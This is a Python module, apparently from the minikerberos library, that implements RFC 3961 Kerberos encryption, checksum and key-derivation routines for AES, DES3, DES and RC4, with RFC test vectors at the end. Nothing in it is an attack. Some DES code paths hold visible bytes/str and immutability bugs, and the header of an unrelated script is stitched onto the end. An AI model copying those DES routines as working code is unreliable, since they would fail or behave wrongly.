# Copyright (C) 2013 by the Massachusetts Institute of Technology.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
#   notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
#   notice, this list of conditions and the following disclaimer in
#   the documentation and/or other materials provided with the
#   distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.

# XXX current status:
# * Done and tested
#   - AES encryption, checksum, string2key, prf
#   - cf2 (needed for FAST)
# * Still to do:
#   - DES enctypes and cksumtypes
#   - RC4 exported enctype (if we need it for anything)
#   - Unkeyed checksums
#   - Special RC4, raw DES/DES3 operations for GSSAPI
# * Difficult or low priority:
#   - Camellia not supported by PyCrypto
#   - Cipher state only needed for kcmd suite
#   - Nonstandard enctypes and cksumtypes like des-hmac-sha1
# Original code was taken from impacket, ported to python3 by Tamas Jos (@skelsec)

from struct import pack, unpack
from binascii import unhexlify
import string
import random
import functools
import os

from math import gcd
import hmac as HMAC
import hashlib
from hashlib import md5 as MD5
from hashlib import sha1 as SHA
from minikerberos.crypto.PBKDF2.pbkdf2 import pbkdf2 as PBKDF2
from minikerberos.crypto.AES import *
from minikerberos.crypto.DES import DES3, DES_CBC, DES_ECB
from minikerberos.crypto.RC4 import RC4 as ARC4
from minikerberos.crypto.DES import DES
from minikerberos.crypto.hashing import md4


def get_random_bytes(lenBytes):
	# We don't really need super strong randomness here to use PyCrypto.Random
	return os.urandom(lenBytes)


class Enctype(object):
	DES_CRC = 1
	DES_MD4 = 2
	DES_MD5 = 3
	DES3 = 16
	AES128 = 17
	AES256 = 18
	RC4 = 23


class Cksumtype(object):
	CRC32 = 1
	MD4 = 2
	MD4_DES = 3
	MD5 = 7
	MD5_DES = 8
	SHA1 = 9
	SHA1_DES3 = 12
	SHA1_AES128 = 15
	SHA1_AES256 = 16
	HMAC_MD5 = -138


class InvalidChecksum(ValueError):
	pass


def _zeropad(s, padsize):
	# Return s padded with 0 bytes to a multiple of padsize.
	padlen = (padsize - (len(s) % padsize)) % padsize
	return s + b'\x00'*padlen


def _xorbytes(b1, b2):
	# xor two strings together and return the resulting string.
	assert len(b1) == len(b2)
	t1 = int.from_bytes(b1, byteorder = 'big', signed = False)
	t2 = int.from_bytes(b2, byteorder = 'big', signed = False)
	return (t1 ^ t2).to_bytes(len(b1), byteorder = 'big', signed = False)


def _mac_equal(mac1, mac2):
	# Constant-time comparison function.  (We can't use HMAC.verify
	# since we use truncated macs.)
	assert len(mac1) == len(mac2)
	res = 0
	for x, y in zip(mac1, mac2):
		res |= x ^ y
	return res == 0


def _nfold(str, nbytes):
	# Convert str to a string of length nbytes using the RFC 3961 nfold
	# operation.

	# Rotate the bytes in str to the right by nbits bits.
	def rotate_right(str, nbits):
		num = int.from_bytes(str, byteorder ='big', signed = False)
		size = len(str)*8
		nbits %= size
		body = num >> nbits
		remains = (num << (size - nbits)) - (body << size)
		return (body + remains).to_bytes(len(str), byteorder ='big', signed = False)

		

	# Add equal-length strings together with end-around carry.
	def add_ones_complement(str1, str2):
		n = len(str1)
		v = []
		for i in range(0,len(str1), 1):
			t = str1[i] + str2[i]
			v.append(t)
		
		#v = [ord(a) + ord(b) for a, b in zip(str1, str2)]
		# Propagate carry bits to the left until there aren't any left.
		while any(x & ~0xff for x in v):
			v = [(v[i-n+1]>>8) + (v[i]&0xff) for i in range(n)]
		return b''.join(x.to_bytes(1, byteorder = 'big', signed = False) for x in v)

	# Concatenate copies of str to produce the least common multiple
	# of len(str) and nbytes, rotating each copy of str to the right
	# by 13 bits times its list position.  Decompose the concatenation
	# into slices of length nbytes, and add them together as
	# big-endian ones' complement integers.
	slen = len(str)
	lcm = int(nbytes * slen / gcd(nbytes, slen))
	bigstr = b''.join((rotate_right(str, 13 * i) for i in range(int(lcm / slen))))
	slices = (bigstr[p:p+nbytes] for p in range(0, lcm, nbytes))
	
	return functools.reduce(add_ones_complement,  slices)


def _is_weak_des_key(keybytes):
	return keybytes in (b'\x01\x01\x01\x01\x01\x01\x01\x01',
						b'\xFE\xFE\xFE\xFE\xFE\xFE\xFE\xFE',
						b'\x1F\x1F\x1F\x1F\x0E\x0E\x0E\x0E',
						b'\xE0\xE0\xE0\xE0\xF1\xF1\xF1\xF1',
						b'\x01\xFE\x01\xFE\x01\xFE\x01\xFE',
						b'\xFE\x01\xFE\x01\xFE\x01\xFE\x01',
						b'\x1F\xE0\x1F\xE0\x0E\xF1\x0E\xF1',
						b'\xE0\x1F\xE0\x1F\xF1\x0E\xF1\x0E',
						b'\x01\xE0\x01\xE0\x01\xF1\x01\xF1',
						b'\xE0\x01\xE0\x01\xF1\x01\xF1\x01',
						b'\x1F\xFE\x1F\xFE\x0E\xFE\x0E\xFE',
						b'\xFE\x1F\xFE\x1F\xFE\x0E\xFE\x0E',
						b'\x01\x1F\x01\x1F\x01\x0E\x01\x0E',
						b'\x1F\x01\x1F\x01\x0E\x01\x0E\x01',
						b'\xE0\xFE\xE0\xFE\xF1\xFE\xF1\xFE',
						b'\xFE\xE0\xFE\xE0\xFE\xF1\xFE\xF1')


class _EnctypeProfile(object):
	# Base class for enctype profiles.  Usable enctype classes must define:
	#   * enctype: enctype number
	#   * keysize: protocol size of key in bytes
	#   * seedsize: random_to_key input size in bytes
	#   * random_to_key (if the keyspace is not dense)
	#   * string_to_key
	#   * encrypt
	#   * decrypt
	#   * prf

	@classmethod
	def random_to_key(cls, seed):
		if len(seed) != cls.seedsize:
			raise ValueError('Wrong seed length')
		return Key(cls.enctype, seed)


class _SimplifiedEnctype(_EnctypeProfile):
	# Base class for enctypes using the RFC 3961 simplified profile.
	# Defines the encrypt, decrypt, and prf methods.  Subclasses must
	# define:
	#   * blocksize: Underlying cipher block size in bytes
	#   * padsize: Underlying cipher padding multiple (1 or blocksize)
	#   * macsize: Size of integrity MAC in bytes
	#   * hashmod: PyCrypto hash module for underlying hash function
	#   * basic_encrypt, basic_decrypt: Underlying CBC/CTS cipher

	@classmethod
	def derive(cls, key, constant):
		# RFC 3961 only says to n-fold the constant only if it is
		# shorter than the cipher block size.  But all Unix
		# implementations n-fold constants if their length is larger
		# than the block size as well, and n-folding when the length
		# is equal to the block size is a no-op.
		plaintext = _nfold(constant, cls.blocksize)
		rndseed = b''
		while len(rndseed) < cls.seedsize:
			ciphertext = cls.basic_encrypt(key, plaintext)
			rndseed += ciphertext
			plaintext = ciphertext
		return cls.random_to_key(rndseed[0:cls.seedsize])

	@classmethod
	def encrypt(cls, key, keyusage, plaintext, confounder):
		ki = cls.derive(key, pack('>IB', keyusage, 0x55))
		ke = cls.derive(key, pack('>IB', keyusage, 0xAA))
		if confounder is None:
			confounder = get_random_bytes(cls.blocksize)
		basic_plaintext = confounder + _zeropad(plaintext, cls.padsize)
		hmac = HMAC.new(ki.contents, basic_plaintext, cls.hashmod).digest()
		return cls.basic_encrypt(ke, basic_plaintext) + hmac[:cls.macsize]

	@classmethod
	def decrypt(cls, key, keyusage, ciphertext):
		ki = cls.derive(key, pack('>IB', keyusage, 0x55))
		ke = cls.derive(key, pack('>IB', keyusage, 0xAA))
		if len(ciphertext) < cls.blocksize + cls.macsize:
			raise ValueError('ciphertext too short')
		basic_ctext, mac = ciphertext[:-cls.macsize], ciphertext[-cls.macsize:]
		if len(basic_ctext) % cls.padsize != 0:
			raise ValueError('ciphertext does not meet padding requirement')
		basic_plaintext = cls.basic_decrypt(ke, basic_ctext)
		hmac = HMAC.new(ki.contents, basic_plaintext, cls.hashmod).digest()
		expmac = hmac[:cls.macsize]
		if not _mac_equal(mac, expmac):
			raise InvalidChecksum('ciphertext integrity failure')
		# Discard the confounder.
		return basic_plaintext[cls.blocksize:]

	@classmethod
	def prf(cls, key, string):
		# Hash the input.  RFC 3961 says to truncate to the padding
		# size, but implementations truncate to the block size.
		hashval = cls.hashmod(string).digest()
		truncated = hashval[:-(len(hashval) % cls.blocksize)]
		# Encrypt the hash with a derived key.
		kp = cls.derive(key, b'prf')
		return cls.basic_encrypt(kp, truncated)

class _DESCBC(_SimplifiedEnctype):
	enctype = Enctype.DES_MD5
	keysize = 8
	seedsize = 8
	blocksize = 8
	padsize = 8
	macsize = 16
	hashmod = MD5

	@classmethod
	def encrypt(cls, key, keyusage, plaintext, confounder):
		if confounder is None:
			confounder = get_random_bytes(cls.blocksize)
		basic_plaintext = confounder + '\x00'*cls.macsize + _zeropad(plaintext, cls.padsize)
		checksum = cls.hashmod.new(basic_plaintext).digest()
		basic_plaintext = basic_plaintext[:len(confounder)] + checksum + basic_plaintext[len(confounder)+len(checksum):]
		return cls.basic_encrypt(key, basic_plaintext)
		
		
	@classmethod
	def decrypt(cls, key, keyusage, ciphertext):
		if len(ciphertext) < cls.blocksize + cls.macsize:
			raise ValueError('ciphertext too short')
		
		complex_plaintext = cls.basic_decrypt(key, ciphertext)
		cofounder = complex_plaintext[:cls.padsize]
		mac = complex_plaintext[cls.padsize:cls.padsize+cls.macsize]
		message = complex_plaintext[cls.padsize+cls.macsize:]
		
		expmac = cls.hashmod.new(cofounder+'\x00'*cls.macsize+message).digest()
		if not _mac_equal(mac, expmac):
			raise InvalidChecksum('ciphertext integrity failure')
		return message
	
	@classmethod
	def mit_des_string_to_key(cls,string,salt):
	
		def fixparity(deskey):
			temp = b''
			for byte in deskey:
				t = (bin(byte)[2:]).rjust(8,'0')
				if t[:7].count('1') %2 == 0:
					temp+= int(t[:7]+'1',2).to_bytes(1, byteorder = 'big', signed = False)
				else:
					temp+= int(t[:7]+'0',2).to_bytes(1, byteorder = 'big', signed = False)
			return temp
	
		def addparity(l1):
			temp = list()
			for byte in l1:
				if (bin(byte).count('1') % 2) == 0:
					byte = (byte << 1)|0b00000001
				else:
					byte = (byte << 1)&0b11111110
				temp.append(byte)
			return temp
		
		def XOR(l1,l2):
			temp = list()
			for b1,b2 in zip(l1,l2):
				temp.append((b1^b2)&0b01111111)
			
			return temp
		
		odd = True
		s = string + salt
		tempstring = [0,0,0,0,0,0,0,0]
		s = s + b'\x00'*( 8- (len(s)%8)) #pad(s); /* with nulls to 8 byte boundary */
		
		for block in [s[i:i+8] for i in range(0, len(s), 8)]:
			temp56 = list()
			#removeMSBits
			for byte in block:
				temp56.append(byte&0b01111111)
			
			#reverse
			if odd == False:
				bintemp = ''
				for byte in temp56:
					bintemp += (bin(byte)[2:]).rjust(7,'0')
				bintemp = bintemp[::-1]
				
				temp56 = list()
				for bits7 in [bintemp[i:i+7] for i in range(0, len(bintemp), 7)]:
					temp56.append(int(bits7,2))

			odd = not odd
				
			tempstring = XOR(tempstring,temp56)
		
		tempkey = b''.join(byte.to_bytes(1, byteorder = 'big', signed = False) for byte in addparity(tempstring))
		if _is_weak_des_key(tempkey):
			tempkey[7] = (tempkey[7] ^ 0xF0).to_bytes(1, byteorder = 'big', signed = False)
		
		cipher = DES(tempkey, DES_CBC, tempkey)
		chekcsumkey = cipher.encrypt(s)[-8:]
		chekcsumkey = fixparity(chekcsumkey)
		if _is_weak_des_key(chekcsumkey):
			chekcsumkey[7] = chr(ord(chekcsumkey[7]) ^ 0xF0)
		
		return Key(cls.enctype, chekcsumkey)

	@classmethod
	def basic_encrypt(cls, key, plaintext):
		assert len(plaintext) % 8 == 0
		des = DES(key.contents, DES_CBC, b'\x00' * 8)
		return des.encrypt(plaintext)

	@classmethod
	def basic_decrypt(cls, key, ciphertext):
		assert len(ciphertext) % 8 == 0
		des = DES(key.contents, DES_CBC, b'\x00' * 8)
		return des.decrypt(ciphertext)		
	
	@classmethod
	def string_to_key(cls, string, salt, params):
		if params is not None and params != '':
			raise ValueError('Invalid DES string-to-key parameters')
		key = cls.mit_des_string_to_key(string, salt)
		return key
	
	

class _DES3CBC(_SimplifiedEnctype):
	enctype = Enctype.DES3
	keysize = 24
	seedsize = 21
	blocksize = 8
	padsize = 8
	macsize = 20
	hashmod = SHA

	@classmethod
	def random_to_key(cls, seed):
		# XXX Maybe reframe as _DESEnctype.random_to_key and use that
		# way from DES3 random-to-key when DES is implemented, since
		# MIT does this instead of the RFC 3961 random-to-key.
		def expand(seed):
			def parity(b):
				# Return b with the low-order bit set to yield odd parity.
				b &= ~1
				return b if bin(b & ~1).count('1') % 2 else b | 1
			assert len(seed) == 7
			firstbytes = [parity(b & ~1) for b in seed]
			lastbyte = parity(sum((seed[i]&1) << i+1 for i in range(7)))
			keybytes = b''.join(b.to_bytes(1, byteorder = 'big', signed = False) for b in firstbytes + [lastbyte])
			if _is_weak_des_key(keybytes):
				keybytes[7] = (keybytes[7] ^ 0xF0).to_bytes(1, byteorder = 'big', signed = False)
			return keybytes
		
		if len(seed) != 21:
			raise ValueError('Wrong seed length')
		k1, k2, k3 = expand(seed[:7]), expand(seed[7:14]), expand(seed[14:])
		return Key(cls.enctype, k1 + k2 + k3)

	@classmethod
	def string_to_key(cls, string, salt, params):
		if params is not None and params != '':
			raise ValueError('Invalid DES3 string-to-key parameters')
		k = cls.random_to_key(_nfold(string + salt, 21))
		return cls.derive(k, 'kerberos'.encode())

	@classmethod
	def basic_encrypt(cls, key, plaintext):
		assert len(plaintext) % 8 == 0
		des3 = DES3(key.contents, DES_CBC, IV = b'\x00' * 8)
		return des3.encrypt(plaintext)

	@classmethod
	def basic_decrypt(cls, key, ciphertext):
		assert len(ciphertext) % 8 == 0
		des3 = DES3(key.contents, DES_CBC, IV = b'\x00' * 8)
		return des3.decrypt(ciphertext)


class _AESEnctype(_SimplifiedEnctype):
	# Base class for aes128-cts and aes256-cts.
	blocksize = 16
	padsize = 1
	macsize = 12
	hashmod = SHA

	@classmethod
	def string_to_key(cls, string, salt, params):
		(iterations,) = unpack('>L', params or b'\x00\x00\x10\x00')
		#prf = lambda p, s: HMAC.new(p, s, SHA).digest()
		#seed = PBKDF2(string, salt, cls.seedsize, iterations, prf)
		seed = PBKDF2(string, salt, iterations, cls.seedsize)
		tkey = cls.random_to_key(seed)
		return cls.derive(tkey, 'kerberos'.encode())

	@classmethod
	def basic_encrypt(cls, key, plaintext):
		assert len(plaintext) >= 16
		aes = AESModeOfOperationCBC(key.contents, b'\x00' * 16)
		ctext = aes.encrypt(_zeropad(plaintext, 16))
		if len(plaintext) > 16:
			# Swap the last two ciphertext blocks and truncate the
			# final block to match the plaintext length.
			lastlen = len(plaintext) % 16 or 16
			ctext = ctext[:-32] + ctext[-16:] + ctext[-32:-16][:lastlen]
		return ctext

	@classmethod
	def basic_decrypt(cls, key, ciphertext):
		assert len(ciphertext) >= 16
		aes = AESModeOfOperationECB(key.contents)
		if len(ciphertext) == 16:
			return aes.decrypt(ciphertext)
		# Split the ciphertext into blocks.  The last block may be partial.
		cblocks = [ciphertext[p:p+16] for p in range(0, len(ciphertext), 16)]
		lastlen = len(cblocks[-1])
		# CBC-decrypt all but the last two blocks.
		prev_cblock = b'\x00' * 16
		plaintext = b''
		for b in cblocks[:-2]:
			plaintext += _xorbytes(aes.decrypt(b), prev_cblock)
			prev_cblock = b
		# Decrypt the second-to-last cipher block.  The left side of
		# the decrypted block will be the final block of plaintext
		# xor'd with the final partial cipher block; the right side
		# will be the omitted bytes of ciphertext from the final
		# block.
		b = aes.decrypt(cblocks[-2])
		lastplaintext =_xorbytes(b[:lastlen], cblocks[-1])
		omitted = b[lastlen:]
		# Decrypt the final cipher block plus the omitted bytes to get
		# the second-to-last plaintext block.
		plaintext += _xorbytes(aes.decrypt(cblocks[-1] + omitted), prev_cblock)
		return plaintext + lastplaintext


class _AES128CTS(_AESEnctype):
	enctype = Enctype.AES128
	keysize = 16
	seedsize = 16


class _AES256CTS(_AESEnctype):
	enctype = Enctype.AES256
	keysize = 32
	seedsize = 32


class _RC4(_EnctypeProfile):
	enctype = Enctype.RC4
	keysize = 16
	seedsize = 16

	@staticmethod
	def usage_str(keyusage):
		# Return a four-byte string for an RFC 3961 keyusage, using
		# the RFC 4757 rules.  Per the errata, do not map 9 to 8.
		table = {3: 8, 23: 13}
		msusage = table[keyusage] if keyusage in table else keyusage
		return pack('<I', msusage)

	@classmethod
	def string_to_key(cls, string, salt, params):
		utf16string = string.decode('UTF-8').encode('UTF-16LE')
		#return Key(cls.enctype, hashlib.new('md4', utf16string).digest())
		data = md4(utf16string).digest() #hashlib.new('md4', utf16string).digest()
		return Key(cls.enctype, data)

	@classmethod
	def encrypt(cls, key, keyusage, plaintext, confounder):
		if confounder is None:
			confounder = get_random_bytes(8)
		ki = HMAC.new(key.contents, cls.usage_str(keyusage), MD5).digest()
		cksum = HMAC.new(ki, confounder + plaintext, MD5).digest()
		ke = HMAC.new(ki, cksum, MD5).digest()
		return cksum + ARC4(ke).encrypt(confounder + plaintext)

	@classmethod
	def decrypt(cls, key, keyusage, ciphertext):
		if len(ciphertext) < 24:
			raise ValueError('ciphertext too short')
		cksum, basic_ctext = ciphertext[:16], ciphertext[16:]
		ki = HMAC.new(key.contents, cls.usage_str(keyusage), MD5).digest()
		ke = HMAC.new(ki, cksum, MD5).digest()
		basic_plaintext = ARC4(ke).decrypt(basic_ctext)
		exp_cksum = HMAC.new(ki, basic_plaintext, MD5).digest()
		ok = _mac_equal(cksum, exp_cksum)
		if not ok and keyusage == 9:
			# Try again with usage 8, due to RFC 4757 errata.
			ki = HMAC.new(key.contents, pack('<I', 8), MD5).digest()
			exp_cksum = HMAC.new(ki, basic_plaintext, MD5).digest()
			ok = _mac_equal(cksum, exp_cksum)
		if not ok:
			raise InvalidChecksum('ciphertext integrity failure')
		# Discard the confounder.
		return basic_plaintext[8:]

	@classmethod
	def prf(cls, key, string):
		return HMAC.new(key.contents, string, SHA).digest()


class _ChecksumProfile(object):
	# Base class for checksum profiles.  Usable checksum classes must
	# define:
	#   * checksum
	#   * verify (if verification is not just checksum-and-compare)
	@classmethod
	def verify(cls, key, keyusage, text, cksum):
		expected = cls.checksum(key, keyusage, text)
		if not _mac_equal(cksum, expected):
			raise InvalidChecksum('checksum verification failure')


class _SimplifiedChecksum(_ChecksumProfile):
	# Base class for checksums using the RFC 3961 simplified profile.
	# Defines the checksum and verify methods.  Subclasses must
	# define:
	#   * macsize: Size of checksum in bytes
	#   * enc: Profile of associated enctype

	@classmethod
	def checksum(cls, key, keyusage, text):
		kc = cls.enc.derive(key, pack('>IB', keyusage, 0x99))
		hmac = HMAC.new(kc.contents, text, cls.enc.hashmod).digest()
		return hmac[:cls.macsize]

	@classmethod
	def verify(cls, key, keyusage, text, cksum):
		if key.enctype != cls.enc.enctype:
			raise ValueError('Wrong key type for checksum')
		super(_SimplifiedChecksum, cls).verify(key, keyusage, text, cksum)


class _SHA1AES128(_SimplifiedChecksum):
	macsize = 12
	enc = _AES128CTS


class _SHA1AES256(_SimplifiedChecksum):
	macsize = 12
	enc = _AES256CTS


class _SHA1DES3(_SimplifiedChecksum):
	macsize = 20
	enc = _DES3CBC


class _HMACMD5(_ChecksumProfile):
	@classmethod
	def checksum(cls, key, keyusage, text):
		ksign = HMAC.new(key.contents, b'signaturekey\x00', MD5).digest()
		md5hash = MD5(_RC4.usage_str(keyusage) + text).digest()
		return HMAC.new(ksign, md5hash, MD5).digest()

	@classmethod
	def verify(cls, key, keyusage, text, cksum):
		if key.enctype != Enctype.RC4:
			raise ValueError('Wrong key type for checksum')
		super(_HMACMD5, cls).verify(key, keyusage, text, cksum)


_enctype_table = {
	Enctype.DES_MD5: _DESCBC,
	Enctype.DES3: _DES3CBC,
	Enctype.AES128: _AES128CTS,
	Enctype.AES256: _AES256CTS,
	Enctype.RC4: _RC4
}


_checksum_table = {
	Cksumtype.SHA1_DES3: _SHA1DES3,
	Cksumtype.SHA1_AES128: _SHA1AES128,
	Cksumtype.SHA1_AES256: _SHA1AES256,
	Cksumtype.HMAC_MD5: _HMACMD5,
	0xffffff76: _HMACMD5
}


def _get_enctype_profile(enctype):
	if enctype not in _enctype_table:
		raise ValueError('Invalid enctype %d' % enctype)
	return _enctype_table[enctype]


def _get_checksum_profile(cksumtype):
	if cksumtype not in _checksum_table:
		raise ValueError('Invalid cksumtype %d' % cksumtype)
	return _checksum_table[cksumtype]


class Key(object):
	def __init__(self, enctype, contents):
		e = _get_enctype_profile(enctype)
		if len(contents) != e.keysize:
			raise ValueError('Wrong key length')
		self.enctype = enctype
		self.contents = contents


def random_to_key(enctype, seed):
	e = _get_enctype_profile(enctype)
	if len(seed) != e.seedsize:
		raise ValueError('Wrong crypto seed length')
	return e.random_to_key(seed)


def string_to_key(enctype, string, salt, params=None):
	e = _get_enctype_profile(enctype)
	return e.string_to_key(string, salt, params)


def encrypt(key, keyusage, plaintext, confounder=None):
	e = _get_enctype_profile(key.enctype)
	return e.encrypt(key, keyusage, plaintext, confounder)


def decrypt(key, keyusage, ciphertext):
	# Throw InvalidChecksum on checksum failure.  Throw ValueError on
	# invalid key enctype or malformed ciphertext.
	e = _get_enctype_profile(key.enctype)
	return e.decrypt(key, keyusage, ciphertext)


def prf(key, string):
	e = _get_enctype_profile(key.enctype)
	return e.prf(key, string)


def make_checksum(cksumtype, key, keyusage, text):
	c = _get_checksum_profile(cksumtype)
	return c.checksum(key, keyusage, text)


def verify_checksum(cksumtype, key, keyusage, text, cksum):
	# Throw InvalidChecksum exception on checksum failure.  Throw
	# ValueError on invalid cksumtype, invalid key enctype, or
	# malformed checksum.
	c = _get_checksum_profile(cksumtype)
	c.verify(key, keyusage, text, cksum)


def cf2(enctype, key1, key2, pepper1, pepper2):
	# Combine two keys and two pepper strings to produce a result key
	# of type enctype, using the RFC 6113 KRB-FX-CF2 function.
	def prfplus(key, pepper, l):
		# Produce l bytes of output using the RFC 6113 PRF+ function.
		out = b''
		count = 1
		while len(out) < l:
			out += prf(key, count.to_bytes(1, byteorder='big', signed = False) + pepper)
			count += 1
		return out[:l]

	e = _get_enctype_profile(enctype)
	return e.random_to_key(_xorbytes(prfplus(key1, pepper1, e.seedsize),
									 prfplus(key2, pepper2, e.seedsize)))


if __name__ == '__main__':
	def h(hexstr):
		return unhexlify(hexstr)

	# AES128 encrypt and decrypt
	kb = h('9062430C8CDA3388922E6D6A509F5B7A')
	conf = h('94B491F481485B9A0678CD3C4EA386AD')
	keyusage = 2
	plain = '9 bytesss'.encode()
	ctxt = h('68FB9679601F45C78857B2BF820FD6E53ECA8D42FD4B1D7024A09205ABB7CD2E'
			 'C26C355D2F')
	k = Key(Enctype.AES128, kb)
	assert(encrypt(k, keyusage, plain, conf) == ctxt)
	assert(decrypt(k, keyusage, ctxt) == plain)

	# AES256 encrypt and decrypt
	kb = h('F1C795E9248A09338D82C3F8D5B567040B0110736845041347235B1404231398')
	conf = h('E45CA518B42E266AD98E165E706FFB60')
	keyusage = 4
	plain = '30 bytes bytes bytes bytes byt'.encode()
	ctxt = h('D1137A4D634CFECE924DBC3BF6790648BD5CFF7DE0E7B99460211D0DAEF3D79A'
			 '295C688858F3B34B9CBD6EEBAE81DAF6B734D4D498B6714F1C1D')
	k = Key(Enctype.AES256, kb)
	assert(encrypt(k, keyusage, plain, conf) == ctxt)
	assert(decrypt(k, keyusage, ctxt) == plain)

	# AES128 checksum
	kb = h('9062430C8CDA3388922E6D6A509F5B7A')
	keyusage = 3
	plain = 'eight nine ten eleven twelve thirteen'.encode()
	cksum = h('01A4B088D45628F6946614E3')
	k = Key(Enctype.AES128, kb)
	verify_checksum(Cksumtype.SHA1_AES128, k, keyusage, plain, cksum)

	# AES256 checksum
	kb = h('B1AE4CD8462AFF1677053CC9279AAC30B796FB81CE21474DD3DDBCFEA4EC76D7')
	keyusage = 4
	plain = 'fourteen'.encode()
	cksum = h('E08739E3279E2903EC8E3836')
	k = Key(Enctype.AES256, kb)
	verify_checksum(Cksumtype.SHA1_AES256, k, keyusage, plain, cksum)

	# AES128 string-to-key
	string = 'password'.encode()
	salt = 'ATHENA.MIT.EDUraeburn'.encode()
	params = h('00000002')
	kb = h('C651BF29E2300AC27FA469D693BDDA13')
	k = string_to_key(Enctype.AES128, string, salt, params)
	assert(k.contents == kb)

	# AES256 string-to-key
	string = b'X' * 64
	salt = 'pass phrase equals block size'.encode()
	params = h('000004B0')
	kb = h('89ADEE3608DB8BC71F1BFBFE459486B05618B70CBAE22092534E56C553BA4B34')
	k = string_to_key(Enctype.AES256, string, salt, params)
	assert(k.contents == kb)

	# AES128 prf
	kb = h('77B39A37A868920F2A51F9DD150C5717')
	k = string_to_key(Enctype.AES128, 'key1'.encode(), 'key1'.encode())
	assert(prf(k, b'\x01\x61') == kb)

	# AES256 prf
	kb = h('0D674DD0F9A6806525A4D92E828BD15A')
	k = string_to_key(Enctype.AES256, 'key2'.encode(), 'key2'.encode())
	assert(prf(k, b'\x02\x62') == kb)

	# AES128 cf2
	kb = h('97DF97E4B798B29EB31ED7280287A92A')
	k1 = string_to_key(Enctype.AES128, 'key1'.encode(), 'key1'.encode())
	k2 = string_to_key(Enctype.AES128, 'key2'.encode(), 'key2'.encode())
	k = cf2(Enctype.AES128, k1, k2, b'a', b'b')
	assert(k.contents == kb)

	# AES256 cf2
	kb = h('4D6CA4E629785C1F01BAF55E2E548566B9617AE3A96868C337CB93B5E72B1C7B')
	k1 = string_to_key(Enctype.AES256, 'key1'.encode(), 'key1'.encode())
	k2 = string_to_key(Enctype.AES256, 'key2'.encode(), 'key2'.encode())
	k = cf2(Enctype.AES256, k1, k2, b'a', b'b')
	assert(k.contents == kb)

	# DES3 encrypt and decrypt
	kb = h('0DD52094E0F41CECCB5BE510A764B35176E3981332F1E598')
	conf = h('94690A17B2DA3C9B')
	keyusage = 3
	plain = b'13 bytes byte'
	ctxt = h('839A17081ECBAFBCDC91B88C6955DD3C4514023CF177B77BF0D0177A16F705E8'
			 '49CB7781D76A316B193F8D30')
	k = Key(Enctype.DES3, kb)
	assert(encrypt(k, keyusage, plain, conf) == ctxt)
	assert(decrypt(k, keyusage, ctxt) == _zeropad(plain, 8))

	# DES3 string-to-key
	string = 'password'.encode()
	salt = 'ATHENA.MIT.EDUraeburn'.encode()
	kb = h('850BB51358548CD05E86768C313E3BFEF7511937DCF72C3E')
	k = string_to_key(Enctype.DES3, string, salt)
	assert(k.contents == kb)

	# DES3 checksum
	kb = h('7A25DF8992296DCEDA0E135BC4046E2375B3C14C98FBC162')
	keyusage = 2
	plain = 'six seven'.encode()
	cksum = h('0EEFC9C3E049AABC1BA5C401677D9AB699082BB4')
	k = Key(Enctype.DES3, kb)
	verify_checksum(Cksumtype.SHA1_DES3, k, keyusage, plain, cksum)

	# DES3 cf2
	kb = h('E58F9EB643862C13AD38E529313462A7F73E62834FE54A01')
	k1 = string_to_key(Enctype.DES3, 'key1'.encode(), 'key1'.encode())
	k2 = string_to_key(Enctype.DES3, 'key2'.encode(), 'key2'.encode())
	k = cf2(Enctype.DES3, k1, k2, b'a', b'b')
	assert(k.contents == kb)

	# RC4 encrypt and decrypt
	kb = h('68F263DB3FCE15D031C9EAB02D67107A')
	conf = h('37245E73A45FBF72')
	keyusage = 4
	plain = b'30 bytes bytes bytes bytes byt'
	ctxt = h('95F9047C3AD75891C2E9B04B16566DC8B6EB9CE4231AFB2542EF87A7B5A0F260'
			 'A99F0460508DE0CECC632D07C354124E46C5D2234EB8')
	k = Key(Enctype.RC4, kb)
	assert(encrypt(k, keyusage, plain, conf) == ctxt)
	assert(decrypt(k, keyusage, ctxt) == plain)

	# RC4 string-to-key
	string = 'foo'.encode()
	kb = h('AC8E657F83DF82BEEA5D43BDAF7800CC')
	k = string_to_key(Enctype.RC4, string, None)
	assert(k.contents == kb)

	# RC4 checksum
	kb = h('F7D3A155AF5E238A0B7A871A96BA2AB2')
	keyusage = 6
	plain = 'seventeen eighteen nineteen twenty'.encode()
	cksum = h('EB38CC97E2230F59DA4117DC5859D7EC')
	k = Key(Enctype.RC4, kb)
	verify_checksum(Cksumtype.HMAC_MD5, k, keyusage, plain, cksum)

	# RC4 cf2
	kb = h('24D7F6B6BAE4E5C00D2082C5EBAB3672')
	k1 = string_to_key(Enctype.RC4, 'key1'.encode(), 'key1'.encode())
	k2 = string_to_key(Enctype.RC4, 'key2'.encode(), 'key2'.encode())
	k = cf2(Enctype.RC4, k1, k2, b'a', b'b')
	assert(k.contents == kb)

	# DES string-to-key
	string = 'password'.encode()
	salt = 'ATHENA.MIT.EDUraeburn'.encode()
	kb = h('cbc22fae235298e3')
	k = string_to_key(Enctype.DES_MD5, string, salt)
	assert(k.contents == kb)
	
	# DES string-to-key
	string = 'potatoe'.encode()
	salt = 'WHITEHOUSE.GOVdanny'.encode()
	kb = h('df3d32a74fd92a01')
	k = string_to_key(Enctype.DES_MD5, string, salt)
	assert(k.contents == kb)
	print('all tests passed!')
	
	



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import os
import logging
